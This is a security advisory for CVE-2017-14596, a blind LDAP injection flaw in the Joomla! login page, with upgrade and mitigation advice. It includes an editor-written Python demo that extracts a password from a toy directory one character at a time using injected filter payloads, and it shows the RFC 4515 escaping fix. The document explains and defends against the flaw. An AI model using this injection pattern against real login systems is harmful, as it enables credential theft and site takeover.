
[Vulnerability notice] CVE-2017-14596: LDAP injection vulnerability in Joomla!

Last Updated: Apr 08, 2018

Joomla! is a popular open-source content management system. On September 20, 2017, security researchers at RIPS disclosed an LDAP injection vulnerability in the Joomla! login controller. Because the submitted username is placed into an LDAP search filter without escaping, a remote attacker can use a blind injection technique to extract the superuser's password from the directory one character at a time. Against a Joomla! 3.7.5 site with LDAP authentication configured, the researchers recovered the superuser password in about 20 seconds.

See the following for more information about the vulnerability.


CVE identifier

CVE-2017-14596

Vulnerability name

Joomla! LDAP injection vulnerability

Vulnerability rating

High

Vulnerability description

The vulnerability in the login page allows a remote attacker to extract authentication credentials from the LDAP server that Joomla! uses, including the user names and passwords of the superuser and the Joomla! administrators. With those credentials the attacker can log on to the administrator control panel, upload a custom Joomla! extension to achieve remote code execution, and so take over the Joomla! site and potentially the underlying web server.

Condition and method of exploitation

The vulnerability is remotely exploitable by an unauthenticated attacker who can reach the login page, provided that LDAP authentication is configured in Joomla!. Installations that authenticate users without the LDAP plugin are not exposed.
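The following Python program is an added illustration written by the editor; it is not Joomla! code and does not reproduce the exact payload from the RIPS write-up. It models the pattern behind this class of bug: a login handler that substitutes the submitted username into a configured LDAP search string, a toy in-memory directory and filter matcher (equality with trailing "*" wildcards and "&" lists only), and the two distinct failure messages ("no such user" versus "bad password") that give a blind attacker a yes/no oracle. The directory contents, the search string and the login flow are all constructed assumptions. With `escape=False` the injected username adds a `userPassword` wildcard assertion to the filter and the oracle leaks the password character by character; with `escape=True` the username is escaped per RFC 4515 and the same payloads match nothing.

```python
"""Blind LDAP injection via an unescaped login filter, and the RFC 4515 fix.

Constructed, self-contained illustration added by the editor. It is not
Joomla! code: the directory, the login() handler and the toy filter matcher
(which understands only (attr=value) with '*' wildcards and (&...) lists)
are assumptions made for the example.
"""
import re
import string

# Constructed directory; a cleartext userPassword keeps the oracle visible.
DIRECTORY = [
    {"uid": "admin", "userPassword": "Sup3r!", "objectClass": "inetOrgPerson"},
    {"uid": "alice", "userPassword": "hunter2", "objectClass": "inetOrgPerson"},
]

# Assumed administrator-configured search string; the login handler replaces
# the [search] placeholder with whatever the user typed into the login form.
SEARCH_STRING = "(&(uid=[search])(objectClass=inetOrgPerson))"


def escape_filter_value(value):
    """RFC 4515 escaping: backslash, '*', '(', ')' and NUL become '\\' + 2 hex digits."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def _value_regex(raw):
    """Assertion value -> regex: '*' is a wildcard, '\\XX' a literal byte, rest literal."""
    parts, i = [], 0
    while i < len(raw):
        if raw[i] == "*":
            parts.append(".*")
            i += 1
        elif raw[i] == "\\" and re.fullmatch(r"[0-9a-fA-F]{2}", raw[i + 1:i + 3]):
            parts.append(re.escape(chr(int(raw[i + 1:i + 3], 16))))
            i += 3
        else:
            parts.append(re.escape(raw[i]))
            i += 1
    return re.compile("".join(parts), re.DOTALL)


def parse_filter(s, i=0):
    """Minimal recursive-descent filter parser; returns (node, next_index).
    Raises ValueError on anything it does not understand, as a server rejects
    a malformed filter."""
    if i >= len(s) or s[i] != "(":
        raise ValueError("expected '(' at %d" % i)
    i += 1
    if i < len(s) and s[i] == "&":
        i += 1
        children = []
        while i < len(s) and s[i] == "(":
            child, i = parse_filter(s, i)
            children.append(child)
        if i >= len(s) or s[i] != ")":
            raise ValueError("unterminated and-filter")
        return ("and", children), i + 1
    end = s.find(")", i)
    if end < 0:
        raise ValueError("unterminated item")
    attr, sep, value = s[i:end].partition("=")
    if not sep or not attr:
        raise ValueError("expected attr=value")
    return ("eq", attr, value), end + 1


def matches(node, entry):
    if node[0] == "and":
        return all(matches(c, entry) for c in node[1])
    _, attr, value = node
    return attr in entry and _value_regex(value).fullmatch(entry[attr]) is not None


def search(filter_string):
    """Evaluate a whole filter against the constructed directory."""
    node, end = parse_filter(filter_string)
    if end != len(filter_string):
        raise ValueError("trailing data after filter")
    return [e for e in DIRECTORY if matches(node, e)]


def login(username, password, escape):
    """Constructed login flow: look the user up, then check the password.
    escape=False is the vulnerable substitution; escape=True is the fix.
    The distinct failure strings are the side channel the attacker reads."""
    needle = escape_filter_value(username) if escape else username
    try:
        found = search(SEARCH_STRING.replace("[search]", needle))
    except ValueError:
        return "malformed filter"
    if len(found) != 1:
        return "no such user"
    if found[0]["userPassword"] != password:
        return "bad password"
    return "ok"


def extract_password(target, escape, alphabet=string.printable.strip(), max_len=32):
    """Recover target's password one character at a time from the oracle.
    Each payload turns the uid assertion into
    (uid=<target>)(userPassword=<known><guess>*), which matches only when
    the guess is the next password character. Returns "" when the fix holds."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            payload = "%s)(userPassword=%s*" % (target, escape_filter_value(known + ch))
            if login(payload, "wrong-guess", escape) == "bad password":
                known += ch
                break
        else:
            return known  # no character extends the prefix: password complete
    return known


if __name__ == "__main__":
    print("vulnerable:", extract_password("admin", escape=False))
    print("fixed:     ", repr(extract_password("admin", escape=True)))
```

Run it and the vulnerable path prints the admin password while the escaped path recovers nothing. The point to take from the fixed branch is that the fix is not input validation of the username but escaping at the filter boundary: after `escape_filter_value`, an injected `)` or `*` is a literal byte in the assertion value and cannot change the filter's structure.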

Affected scope

Joomla! 1.5 through 3.7.5

Unaffected version: Joomla! 3.8.0

Vulnerability detection

Check whether the installation runs an affected version of Joomla! (1.5 through 3.7.5) and whether the LDAP authentication plugin is enabled. Both conditions must hold for the site to be exposed; a site on an affected version that does not authenticate against LDAP is not reachable through this vulnerability.

How to fix or mitigate

We recommend that you upgrade Joomla! to 3.8.0, the first release that fixes this vulnerability, or to a later official version. If the upgrade cannot be applied immediately, disabling the LDAP authentication plugin removes the exploitable condition until the upgrade is done.

Reference

[1]. https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
[2]. https://www.joomla.org/announcements.html
[3]. https://downloads.joomla.org/
